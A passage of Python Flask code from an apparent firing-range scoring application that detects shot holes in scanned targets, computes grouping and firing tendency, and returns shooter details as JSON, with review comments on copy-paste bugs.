                   set_1_army=armies[1],
                   current_army_no=current_army_no,
                   set_1_session_no=session_nos[1],
                   current_session_no=current_session_no,
                   set_1_detail_no=detail_nos[1],
                   current_detail_no=current_detail_no,
                   set_2_x=xs[2],
                   set_2_y=ys[2],
                   set_2_name=names[2],
                   set_2_army=armies[2],
                   set_2_detail_no=detail_nos[2],
                   set_2_session_no=session_nos[2],
                   set_3_x=xs[3],
                   set_3_y=ys[3],
                   set_3_name=names[3],
                   set_3_army=armies[3],
                   set_3_session_no=session_nos[3],
                   set_3_detail_no=detail_nos[3],
                   set_4_x=xs[4],
                   set_4_y=ys[4],
                   set_4_name=names[4],
                   set_4_army=armies[4],
                   set_4_session_no=session_nos[4],
                   set_4_detail_no=detail_nos[4]
                   )
@app.route('/prediction_target_8/', methods=['GET', 'POST'])
def prediction_target_8():
    """Serve shot-prediction data for target lane 8 as JSON.

    On POST: runs ``prediction_calculation_8()``, then looks up, for today's
    paper reference and session, the firer identity (name / service no /
    session / detail) for sets 1-4 and the final shot coordinates for sets
    2-4, and returns everything in one JSON payload.  On GET: returns the
    same JSON shape filled with zero/empty placeholders.

    Returns:
        flask.Response: JSON with the same keys the original handler emitted
        (x1, y1, xmpi1, ..., set_4_detail_no).
    """
    TARGET_NO = 8
    # Placeholder values so a GET still produces a complete payload.
    t1_x = t1_y = gp = 0
    Tfirt_x_j = Tfirt_y_j = 0
    result_1 = None
    fir_tendency_1 = None
    current_firer_name = None
    current_army_no = None
    current_session_no = None
    current_detail_no = None
    # Per-set lookups, keyed by set number (1-4 for identity, 2-4 for shots).
    names = {n: None for n in (1, 2, 3, 4)}
    armies = {n: None for n in (1, 2, 3, 4)}
    session_nos = {n: None for n in (1, 2, 3, 4)}
    detail_nos = {n: None for n in (1, 2, 3, 4)}
    xs = {n: [] for n in (2, 3, 4)}
    ys = {n: [] for n in (2, 3, 4)}
    fin_x_arr_1 = []
    fin_y_arr_1 = []
    curdate = time.strftime("%Y-%m-%d")
    if request.method == 'POST':
        (firer_id, sess, o, p, u, q, t1_x, t1_y, xmpi, ympi, f, gp,
         Tfirt_x, Tfirt_y, fin_x_1, fin_y_1, result_1,
         fir_tendency_1) = prediction_calculation_8()
        paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()

        def for_set(query, set_no):
            # Shared filter: this target, today, this paper ref and session.
            return query.filter(
                T_Firer_Details.date == curdate,
                T_Firer_Details.target_no == TARGET_NO,
                T_Firer_Details.set_no == set_no,
                T_Firer_Details.paper_ref == paper_ref,
                T_Firer_Details.session_id == sess,
            )

        for n in (2, 3, 4):
            # One query per set; the old code ran the identical query twice
            # (once for x, once for y).
            rows = for_set(db.session.query(T_Firer_Details), n).all()
            xs[n] = [int(r.final_x) for r in rows]
            ys[n] = [int(r.final_y) for r in rows]
        for n in (1, 2, 3, 4):
            set_id = for_set(
                db.session.query(T_Firer_Details.firer_id), n
            ).distinct().scalar()
            session_nos[n] = for_set(
                db.session.query(T_Firer_Details.session_id), n
            ).distinct().scalar()
            detail_nos[n] = for_set(
                db.session.query(T_Firer_Details.detail_id), n
            ).distinct().scalar()
            names[n] = db.session.query(Shooter.name).filter(
                Shooter.id == set_id).scalar()
            armies[n] = db.session.query(Shooter.service_id).filter(
                Shooter.id == set_id).scalar()
        current_firer_name = db.session.query(Shooter.name).filter(
            Shooter.id == firer_id).scalar()
        current_army_no = db.session.query(Shooter.service_id).filter(
            Shooter.id == firer_id).scalar()
        # NOTE(review): filters on target_1_id even though this is the
        # target-8 route — looks copy-pasted; confirm the intended column.
        current_session_no = db.session.query(TShooting.session_id).filter(
            TShooting.target_1_id == firer_id).scalar()
        current_detail_no = db.session.query(TShooting.detail_no).filter(
            TShooting.target_1_id == firer_id).scalar()
        # NOTE(review): the original also computed xmpi_j/ympi_j via
        # pixeltoinch() but never sent them (xmpi1/ympi1 carry Tfirt_*_j);
        # that dead work is dropped here.  If xmpi1 was *meant* to carry the
        # inch-converted MPI, that is a separate behavior change to confirm.
        Tfirt_x_j = pd.Series(Tfirt_x).to_json(orient='values')
        Tfirt_y_j = pd.Series(Tfirt_y).to_json(orient='values')
        fin_x_arr_1 = [int(r.final_x) for r in fin_x_1]
        fin_y_arr_1 = [int(r.final_y) for r in fin_y_1]
    return jsonify(x1=t1_x,
                   y1=t1_y,
                   xmpi1=Tfirt_x_j,
                   ympi1=Tfirt_y_j,
                   gp=gp,
                   txf1=Tfirt_x_j,
                   tyf1=Tfirt_y_j,
                   fx1=fin_x_arr_1,
                   fy1=fin_y_arr_1,
                   result_1=result_1,
                   fir_tendency_1=fir_tendency_1,
                   set_1_name=names[1],
                   current_firer_name=current_firer_name,
                   set_1_army=armies[1],
                   current_army_no=current_army_no,
                   set_1_session_no=session_nos[1],
                   current_session_no=current_session_no,
                   set_1_detail_no=detail_nos[1],
                   current_detail_no=current_detail_no,
                   set_2_x=xs[2],
                   set_2_y=ys[2],
                   set_2_name=names[2],
                   set_2_army=armies[2],
                   set_2_detail_no=detail_nos[2],
                   set_2_session_no=session_nos[2],
                   set_3_x=xs[3],
                   set_3_y=ys[3],
                   set_3_name=names[3],
                   set_3_army=armies[3],
                   set_3_session_no=session_nos[3],
                   set_3_detail_no=detail_nos[3],
                   set_4_x=xs[4],
                   set_4_y=ys[4],
                   set_4_name=names[4],
                   set_4_army=armies[4],
                   set_4_session_no=session_nos[4],
                   set_4_detail_no=detail_nos[4]
                   )
@app.route('/previous_page_target_1/', methods=['GET', 'POST'])
def previous_page_target_1():
    """Render the summary page for firing targets 1-4.

    For each of the four targets of the current TShooting row, look up the
    shooter's name, service number and rank name, then pass them to the
    template as T1_name/T1_service/T1_rank ... T4_rank.
    """
    ctx = {}
    target_columns = (
        ('T1', TShooting.target_1_id),
        ('T2', TShooting.target_2_id),
        ('T3', TShooting.target_3_id),
        ('T4', TShooting.target_4_id),
    )
    for label, target_col in target_columns:
        ctx[label + '_name'] = db.session.query(Shooter.name).filter(
            Shooter.id == target_col).scalar()
        ctx[label + '_service'] = db.session.query(Shooter.service_id).filter(
            Shooter.id == target_col).scalar()
        rank_id = db.session.query(Shooter.rank_id).filter(
            Shooter.id == target_col).scalar()
        ctx[label + '_rank'] = db.session.query(Rank.name).filter(
            Rank.id == rank_id).scalar()
    # Same diagnostic output as before the rewrite.
    print(ctx['T1_rank'])
    print(ctx['T2_rank'])
    print(ctx['T3_rank'])
    print(ctx['T4_rank'])
    return render_template('pages/previous_page_target_1.html', **ctx)
@app.route('/previous_page_target_5/', methods=['GET', 'POST'])
def previous_page_target_5():
    """Render the summary page for firing targets 5-8.

    Mirrors previous_page_target_1 for the second bank of targets: resolves
    each shooter's name, service number and rank name and hands them to the
    template as T5_name/T5_service/T5_rank ... T8_rank.
    """
    ctx = {}
    target_columns = (
        ('T5', TShooting.target_5_id),
        ('T6', TShooting.target_6_id),
        ('T7', TShooting.target_7_id),
        ('T8', TShooting.target_8_id),
    )
    for label, target_col in target_columns:
        ctx[label + '_name'] = db.session.query(Shooter.name).filter(
            Shooter.id == target_col).scalar()
        ctx[label + '_service'] = db.session.query(Shooter.service_id).filter(
            Shooter.id == target_col).scalar()
        rank_id = db.session.query(Shooter.rank_id).filter(
            Shooter.id == target_col).scalar()
        ctx[label + '_rank'] = db.session.query(Rank.name).filter(
            Rank.id == rank_id).scalar()
    return render_template('pages/previous_page_target_5.html', **ctx)
def prediction_calculation_1():
    """Run shot detection on target 1's scanned image and assemble results.

    Returns an 18-tuple: (firer_id, sess_id, detail_id, target_no, set_no,
    paper_ref, X_json, Y_json, xmpi1, ympi1, f1, gp_1, firt_x, firt_y,
    data_x_1, data_y_1, result_1, fir_tendency_txt).
    """
    curdate = time.strftime("%Y-%m-%d")
    # Defaults used when no shot centroids are detected below.
    X_json = 0
    Y_json = 0
    firer_id = db.session.query(TShooting.target_1_id).scalar()
    sess_id = db.session.query(TShooting.session_id).scalar()
    detail_id = db.session.query(TShooting.detail_no).scalar()
    target_no = 1
    paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()
    print(paper_ref)
    # NOTE(review): these two queries use Firer_Details while every sibling
    # (prediction_calculation_2..8) queries T_Firer_Details -- confirm which
    # table is intended here.
    data_x_1 = db.session.query(Firer_Details).filter(
        Firer_Details.date == curdate,
        Firer_Details.target_no == 1,
        Firer_Details.set_no == 1,
        Firer_Details.paper_ref == paper_ref,
        Firer_Details.session_id == sess_id).all()
    data_y_1 = db.session.query(Firer_Details).filter(
        Firer_Details.date == curdate,
        Firer_Details.target_no == 1,
        Firer_Details.set_no == 1,
        Firer_Details.paper_ref == paper_ref,
        Firer_Details.session_id == sess_id).all()
    print(data_x_1)
    set_no = db.session.query(TShooting.set_no).scalar()
    # NOTE(review): paper_ref is re-read from TShooting here, overriding the
    # TPaper_ref value used for the queries above -- confirm this is intended.
    paper_ref = db.session.query(TShooting.paper_ref).scalar()
    print('Old x')
    print(data_x_1)
    image = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/1.png')
    # image=Image.open('/Users/wasifaahmed/Documents/FRAS/Fras_production_v.0.1/FRAS Windows/FRAS Windows/FRAS_production/static/img_dump/1.png')
    w, h = image.size
    predictedMatrix = predictAsMatrix(image, w, h)
    g = Graph(80, 80, predictedMatrix)
    N = g.countIslands()
    points(predictedMatrix, h=80, w=80)
    centroids = kmean(N, pointsarray)
    print(centroids)
    if centroids is None:
        # Bug fix: these fallbacks were written as "x=0," etc., whose trailing
        # commas produced 1-tuples like (0,). Callers compare x against 0, so
        # the tuple values silently broke the no-shot path.
        x = 0
        y = 0
        mpit = 0
        xmpi1 = 0
        ympi1 = 0
        f1 = 0
        firt_x = 0
        firt_y = 0
        fir_tendency_code = ""
        fir_tendency_txt = ""
        gp_1 = ""
        result_1 = ""
    else:
        # Image rows/cols -> plot coordinates (y axis flipped on a 2000 grid).
        x = centroids[:, 1]
        y = 2000 - centroids[:, 0]
        X_json = pd.Series(x).to_json(orient='values')
        Y_json = pd.Series(y).to_json(orient='values')
        mpit = mpi(1, centroids)
        xmpi1 = mpit[:, 1]
        ympi1 = 2000 - mpit[:, 0]
        f1, firt_x, firt_y = firing_tendancy(1000, 1000, xmpi1, ympi1)
        fir_tendency_txt, fir_tendency_code = getfiringtendencytext(f1, firt_x, firt_y)
        gp_1 = grouping_length(0, 0, x, y)
        result_1 = getresulttext(gp_1)
    return (firer_id, sess_id, detail_id, target_no, set_no, paper_ref,
            X_json, Y_json, xmpi1, ympi1, f1, gp_1, firt_x, firt_y,
            data_x_1, data_y_1, result_1, fir_tendency_txt)
def prediction_calculation_2():
    """Run shot detection on target 2's scanned image and assemble results.

    Returns the same 18-tuple layout as prediction_calculation_1.
    """
    curdate = time.strftime("%Y-%m-%d")
    # Defaults used when no shot centroids are detected below.
    X_json = 0
    Y_json = 0
    firer_id = db.session.query(TShooting.target_2_id).scalar()
    sess_id = db.session.query(TShooting.session_id).scalar()
    detail_id = db.session.query(TShooting.detail_no).scalar()
    target_no = 2
    paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()
    print(paper_ref)
    data_x_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 2,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    data_y_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 2,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    print(data_x_1)
    set_no = db.session.query(TShooting.set_no).scalar()
    # NOTE(review): paper_ref is re-read from TShooting, overriding the
    # TPaper_ref value used for the queries above -- confirm this is intended.
    paper_ref = db.session.query(TShooting.paper_ref).scalar()
    print('Old x')
    print(data_x_1)
    image = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/2.png')
    w, h = image.size
    predictedMatrix = predictAsMatrix(image, w, h)
    g = Graph(80, 80, predictedMatrix)
    N = g.countIslands()
    points(predictedMatrix, h=80, w=80)
    centroids = kmean(N, pointsarray)
    if centroids is None:
        # Bug fix: the fallbacks were "x=0," etc.; the trailing commas made
        # them 1-tuples (0,), breaking the callers' "x == 0" no-shot check.
        x = 0
        y = 0
        mpit = 0
        xmpi1 = 0
        ympi1 = 0
        f1 = 0
        firt_x = 0
        firt_y = 0
        fir_tendency_code = ""
        fir_tendency_txt = ""
        gp_1 = ""
        result_1 = ""
    else:
        x = centroids[:, 1]
        y = 2000 - centroids[:, 0]
        X_json = pd.Series(x).to_json(orient='values')
        Y_json = pd.Series(y).to_json(orient='values')
        mpit = mpi(1, centroids)
        xmpi1 = mpit[:, 1]
        ympi1 = 2000 - mpit[:, 0]
        f1, firt_x, firt_y = firing_tendancy(1000, 1000, xmpi1, ympi1)
        fir_tendency_txt, fir_tendency_code = getfiringtendencytext(f1, firt_x, firt_y)
        gp_1 = grouping_length(0, 0, x, y)
        result_1 = getresulttext(gp_1)
    return (firer_id, sess_id, detail_id, target_no, set_no, paper_ref,
            X_json, Y_json, xmpi1, ympi1, f1, gp_1, firt_x, firt_y,
            data_x_1, data_y_1, result_1, fir_tendency_txt)
def prediction_calculation_3():
    """Run shot detection on target 3's scanned image and assemble results.

    Returns the same 18-tuple layout as prediction_calculation_1.
    """
    # Defaults used when no shot centroids are detected below.
    X_json = 0
    Y_json = 0
    curdate = time.strftime("%Y-%m-%d")
    firer_id = db.session.query(TShooting.target_3_id).scalar()
    sess_id = db.session.query(TShooting.session_id).scalar()
    detail_id = db.session.query(TShooting.detail_no).scalar()
    target_no = 3
    paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()
    print(paper_ref)
    data_x_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 3,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    data_y_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 3,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    print(data_x_1)
    set_no = db.session.query(TShooting.set_no).scalar()
    # NOTE(review): paper_ref is re-read from TShooting, overriding the
    # TPaper_ref value used for the queries above -- confirm this is intended.
    paper_ref = db.session.query(TShooting.paper_ref).scalar()
    print('Old x')
    print(data_x_1)
    image = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/3.png')
    w, h = image.size
    predictedMatrix = predictAsMatrix(image, w, h)
    g = Graph(80, 80, predictedMatrix)
    N = g.countIslands()
    points(predictedMatrix, h=80, w=80)
    centroids = kmean(N, pointsarray)
    if centroids is None:
        # Bug fix: the fallbacks were "x=0," etc.; the trailing commas made
        # them 1-tuples (0,), breaking the callers' "x == 0" no-shot check.
        x = 0
        y = 0
        mpit = 0
        xmpi1 = 0
        ympi1 = 0
        f1 = 0
        firt_x = 0
        firt_y = 0
        fir_tendency_code = ""
        fir_tendency_txt = ""
        gp_1 = ""
        result_1 = ""
    else:
        x = centroids[:, 1]
        y = 2000 - centroids[:, 0]
        X_json = pd.Series(x).to_json(orient='values')
        Y_json = pd.Series(y).to_json(orient='values')
        mpit = mpi(1, centroids)
        xmpi1 = mpit[:, 1]
        ympi1 = 2000 - mpit[:, 0]
        f1, firt_x, firt_y = firing_tendancy(1000, 1000, xmpi1, ympi1)
        fir_tendency_txt, fir_tendency_code = getfiringtendencytext(f1, firt_x, firt_y)
        # Bug fix: the debug label wrongly said prediction_calculation_1
        # (stale copy-paste); corrected to this function's name.
        print("calling from prediction_calculation_3")
        gp_1 = grouping_length(0, 0, x, y)
        result_1 = getresulttext(gp_1)
    return (firer_id, sess_id, detail_id, target_no, set_no, paper_ref,
            X_json, Y_json, xmpi1, ympi1, f1, gp_1, firt_x, firt_y,
            data_x_1, data_y_1, result_1, fir_tendency_txt)
def prediction_calculation_4():
    """Run shot detection on target 4's scanned image and assemble results.

    Returns the same 18-tuple layout as prediction_calculation_1.
    """
    curdate = time.strftime("%Y-%m-%d")
    # Bug fix: X_json/Y_json were never initialized in this function, so the
    # return statement raised UnboundLocalError whenever centroids was None
    # (prediction_calculation_1..3 already define these defaults).
    X_json = 0
    Y_json = 0
    firer_id = db.session.query(TShooting.target_4_id).scalar()
    sess_id = db.session.query(TShooting.session_id).scalar()
    detail_id = db.session.query(TShooting.detail_no).scalar()
    target_no = 4
    paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()
    print(paper_ref)
    data_x_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 4,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    # NOTE(review): siblings query the full T_Firer_Details entity here, but
    # this function selects only final_y -- confirm which shape callers need.
    data_y_1 = db.session.query(T_Firer_Details.final_y).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 4,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    print(data_x_1)
    set_no = db.session.query(TShooting.set_no).scalar()
    # NOTE(review): paper_ref is re-read from TShooting, overriding the
    # TPaper_ref value used for the queries above -- confirm this is intended.
    paper_ref = db.session.query(TShooting.paper_ref).scalar()
    print('Old x')
    print(data_x_1)
    image = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/4.png')
    w, h = image.size
    predictedMatrix = predictAsMatrix(image, w, h)
    g = Graph(80, 80, predictedMatrix)
    N = g.countIslands()
    points(predictedMatrix, h=80, w=80)
    centroids = kmean(N, pointsarray)
    if centroids is None:
        # Bug fix: the fallbacks were "x=0," etc.; the trailing commas made
        # them 1-tuples (0,), breaking the callers' "x == 0" no-shot check.
        x = 0
        y = 0
        mpit = 0
        xmpi1 = 0
        ympi1 = 0
        f1 = 0
        firt_x = 0
        firt_y = 0
        fir_tendency_code = ""
        fir_tendency_txt = ""
        gp_1 = ""
        result_1 = ""
    else:
        x = centroids[:, 1]
        y = 2000 - centroids[:, 0]
        X_json = pd.Series(x).to_json(orient='values')
        Y_json = pd.Series(y).to_json(orient='values')
        mpit = mpi(1, centroids)
        xmpi1 = mpit[:, 1]
        ympi1 = 2000 - mpit[:, 0]
        f1, firt_x, firt_y = firing_tendancy(1000, 1000, xmpi1, ympi1)
        fir_tendency_txt, fir_tendency_code = getfiringtendencytext(f1, firt_x, firt_y)
        # Bug fix: stale copy-paste debug label corrected to this function.
        print("calling from prediction_calculation_4")
        gp_1 = grouping_length(0, 0, x, y)
        result_1 = getresulttext(gp_1)
    return (firer_id, sess_id, detail_id, target_no, set_no, paper_ref,
            X_json, Y_json, xmpi1, ympi1, f1, gp_1, firt_x, firt_y,
            data_x_1, data_y_1, result_1, fir_tendency_txt)
def prediction_calculation_5():
    """Run shot detection on target 5's scanned image and assemble results.

    Returns the same 18-tuple layout as prediction_calculation_1.
    """
    curdate = time.strftime("%Y-%m-%d")
    # Bug fix: X_json/Y_json were never initialized here, so the return
    # statement raised UnboundLocalError whenever centroids was None.
    X_json = 0
    Y_json = 0
    firer_id = db.session.query(TShooting.target_5_id).scalar()
    sess_id = db.session.query(TShooting.session_id).scalar()
    detail_id = db.session.query(TShooting.detail_no).scalar()
    target_no = 5
    paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()
    print(paper_ref)
    data_x_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 5,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    data_y_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 5,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    print(data_x_1)
    set_no = db.session.query(TShooting.set_no).scalar()
    # NOTE(review): paper_ref is re-read from TShooting, overriding the
    # TPaper_ref value used for the queries above -- confirm this is intended.
    paper_ref = db.session.query(TShooting.paper_ref).scalar()
    print('Old x')
    print(data_x_1)
    image = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/5.png')
    w, h = image.size
    predictedMatrix = predictAsMatrix(image, w, h)
    g = Graph(80, 80, predictedMatrix)
    N = g.countIslands()
    points(predictedMatrix, h=80, w=80)
    centroids = kmean(N, pointsarray)
    if centroids is None:
        # Bug fix: the fallbacks were "x=0," etc.; the trailing commas made
        # them 1-tuples (0,), breaking the callers' "x == 0" no-shot check.
        x = 0
        y = 0
        mpit = 0
        xmpi1 = 0
        ympi1 = 0
        f1 = 0
        firt_x = 0
        firt_y = 0
        fir_tendency_code = ""
        fir_tendency_txt = ""
        gp_1 = ""
        result_1 = ""
    else:
        x = centroids[:, 1]
        y = 2000 - centroids[:, 0]
        X_json = pd.Series(x).to_json(orient='values')
        Y_json = pd.Series(y).to_json(orient='values')
        mpit = mpi(1, centroids)
        xmpi1 = mpit[:, 1]
        ympi1 = 2000 - mpit[:, 0]
        f1, firt_x, firt_y = firing_tendancy(1000, 1000, xmpi1, ympi1)
        fir_tendency_txt, fir_tendency_code = getfiringtendencytext(f1, firt_x, firt_y)
        # Bug fix: stale copy-paste debug label corrected to this function.
        print("calling from prediction_calculation_5")
        gp_1 = grouping_length(0, 0, x, y)
        result_1 = getresulttext(gp_1)
    return (firer_id, sess_id, detail_id, target_no, set_no, paper_ref,
            X_json, Y_json, xmpi1, ympi1, f1, gp_1, firt_x, firt_y,
            data_x_1, data_y_1, result_1, fir_tendency_txt)
def prediction_calculation_6():
    """Run shot detection on target 6's scanned image and assemble results.

    Returns the same 18-tuple layout as prediction_calculation_1.
    """
    curdate = time.strftime("%Y-%m-%d")
    # Bug fix: X_json/Y_json were never initialized here, so the return
    # statement raised UnboundLocalError whenever centroids was None.
    X_json = 0
    Y_json = 0
    firer_id = db.session.query(TShooting.target_6_id).scalar()
    sess_id = db.session.query(TShooting.session_id).scalar()
    detail_id = db.session.query(TShooting.detail_no).scalar()
    target_no = 6
    paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()
    print(paper_ref)
    data_x_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 6,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    data_y_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 6,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    print(data_x_1)
    set_no = db.session.query(TShooting.set_no).scalar()
    # NOTE(review): paper_ref is re-read from TShooting, overriding the
    # TPaper_ref value used for the queries above -- confirm this is intended.
    paper_ref = db.session.query(TShooting.paper_ref).scalar()
    print('Old x')
    print(data_x_1)
    image = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/6.png')
    w, h = image.size
    predictedMatrix = predictAsMatrix(image, w, h)
    g = Graph(80, 80, predictedMatrix)
    N = g.countIslands()
    points(predictedMatrix, h=80, w=80)
    centroids = kmean(N, pointsarray)
    if centroids is None:
        # Bug fix: the fallbacks were "x=0," etc.; the trailing commas made
        # them 1-tuples (0,), breaking the callers' "x == 0" no-shot check.
        x = 0
        y = 0
        mpit = 0
        xmpi1 = 0
        ympi1 = 0
        f1 = 0
        firt_x = 0
        firt_y = 0
        fir_tendency_code = ""
        fir_tendency_txt = ""
        gp_1 = ""
        result_1 = ""
    else:
        x = centroids[:, 1]
        y = 2000 - centroids[:, 0]
        X_json = pd.Series(x).to_json(orient='values')
        Y_json = pd.Series(y).to_json(orient='values')
        mpit = mpi(1, centroids)
        xmpi1 = mpit[:, 1]
        ympi1 = 2000 - mpit[:, 0]
        f1, firt_x, firt_y = firing_tendancy(1000, 1000, xmpi1, ympi1)
        fir_tendency_txt, fir_tendency_code = getfiringtendencytext(f1, firt_x, firt_y)
        # Bug fix: stale copy-paste debug label corrected to this function.
        print("calling from prediction_calculation_6")
        gp_1 = grouping_length(0, 0, x, y)
        result_1 = getresulttext(gp_1)
    return (firer_id, sess_id, detail_id, target_no, set_no, paper_ref,
            X_json, Y_json, xmpi1, ympi1, f1, gp_1, firt_x, firt_y,
            data_x_1, data_y_1, result_1, fir_tendency_txt)
def prediction_calculation_7():
    """Run shot detection on target 7's scanned image and assemble results.

    Returns the same 18-tuple layout as prediction_calculation_1.
    """
    curdate = time.strftime("%Y-%m-%d")
    # Bug fix: X_json/Y_json were never initialized here, so the return
    # statement raised UnboundLocalError whenever centroids was None.
    X_json = 0
    Y_json = 0
    firer_id = db.session.query(TShooting.target_7_id).scalar()
    sess_id = db.session.query(TShooting.session_id).scalar()
    detail_id = db.session.query(TShooting.detail_no).scalar()
    target_no = 7
    paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()
    print(paper_ref)
    data_x_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 7,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    # NOTE(review): siblings query the full T_Firer_Details entity here, but
    # this function selects only final_y -- confirm which shape callers need.
    data_y_1 = db.session.query(T_Firer_Details.final_y).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 7,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    print(data_x_1)
    set_no = db.session.query(TShooting.set_no).scalar()
    # NOTE(review): paper_ref is re-read from TShooting, overriding the
    # TPaper_ref value used for the queries above -- confirm this is intended.
    paper_ref = db.session.query(TShooting.paper_ref).scalar()
    print('Old x')
    print(data_x_1)
    image = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/7.png')
    w, h = image.size
    predictedMatrix = predictAsMatrix(image, w, h)
    g = Graph(80, 80, predictedMatrix)
    N = g.countIslands()
    points(predictedMatrix, h=80, w=80)
    centroids = kmean(N, pointsarray)
    if centroids is None:
        # Bug fix: the fallbacks were "x=0," etc.; the trailing commas made
        # them 1-tuples (0,), breaking the callers' "x == 0" no-shot check.
        x = 0
        y = 0
        mpit = 0
        xmpi1 = 0
        ympi1 = 0
        f1 = 0
        firt_x = 0
        firt_y = 0
        fir_tendency_code = ""
        fir_tendency_txt = ""
        gp_1 = ""
        result_1 = ""
    else:
        x = centroids[:, 1]
        y = 2000 - centroids[:, 0]
        X_json = pd.Series(x).to_json(orient='values')
        Y_json = pd.Series(y).to_json(orient='values')
        mpit = mpi(1, centroids)
        xmpi1 = mpit[:, 1]
        ympi1 = 2000 - mpit[:, 0]
        f1, firt_x, firt_y = firing_tendancy(1000, 1000, xmpi1, ympi1)
        fir_tendency_txt, fir_tendency_code = getfiringtendencytext(f1, firt_x, firt_y)
        # Bug fix: stale copy-paste debug label corrected to this function.
        print("calling from prediction_calculation_7")
        gp_1 = grouping_length(0, 0, x, y)
        result_1 = getresulttext(gp_1)
    return (firer_id, sess_id, detail_id, target_no, set_no, paper_ref,
            X_json, Y_json, xmpi1, ympi1, f1, gp_1, firt_x, firt_y,
            data_x_1, data_y_1, result_1, fir_tendency_txt)
def prediction_calculation_8():
    """Run shot detection on target 8's scanned image and assemble results.

    Returns the same 18-tuple layout as prediction_calculation_1.
    """
    # NOTE(review): this is the only sibling that clears the Flask session;
    # it wipes all stored UI corrections ('x1', 'tmpi', ...) -- confirm
    # this is intentional.
    session.clear()
    curdate = time.strftime("%Y-%m-%d")
    # Bug fix: X_json/Y_json were never initialized here, so the return
    # statement raised UnboundLocalError whenever centroids was None.
    X_json = 0
    Y_json = 0
    firer_id = db.session.query(TShooting.target_8_id).scalar()
    sess_id = db.session.query(TShooting.session_id).scalar()
    detail_id = db.session.query(TShooting.detail_no).scalar()
    target_no = 8
    paper_ref = db.session.query(TPaper_ref.paper_ref).scalar()
    print(paper_ref)
    data_x_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 8,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    data_y_1 = db.session.query(T_Firer_Details).filter(
        T_Firer_Details.date == curdate,
        T_Firer_Details.target_no == 8,
        T_Firer_Details.set_no == 1,
        T_Firer_Details.paper_ref == paper_ref,
        T_Firer_Details.session_id == sess_id).all()
    print(data_x_1)
    set_no = db.session.query(TShooting.set_no).scalar()
    # NOTE(review): paper_ref is re-read from TShooting, overriding the
    # TPaper_ref value used for the queries above -- confirm this is intended.
    paper_ref = db.session.query(TShooting.paper_ref).scalar()
    print('Old x')
    print(data_x_1)
    image = Image.open('E:/FRAS Windows/FRAS_production/static/img_dump/8.png')
    w, h = image.size
    predictedMatrix = predictAsMatrix(image, w, h)
    g = Graph(80, 80, predictedMatrix)
    N = g.countIslands()
    points(predictedMatrix, h=80, w=80)
    centroids = kmean(N, pointsarray)
    if centroids is None:
        # Bug fix: the fallbacks were "x=0," etc.; the trailing commas made
        # them 1-tuples (0,), breaking the callers' "x == 0" no-shot check.
        x = 0
        y = 0
        mpit = 0
        xmpi1 = 0
        ympi1 = 0
        f1 = 0
        firt_x = 0
        firt_y = 0
        fir_tendency_code = ""
        fir_tendency_txt = ""
        gp_1 = ""
        result_1 = ""
    else:
        x = centroids[:, 1]
        y = 2000 - centroids[:, 0]
        X_json = pd.Series(x).to_json(orient='values')
        Y_json = pd.Series(y).to_json(orient='values')
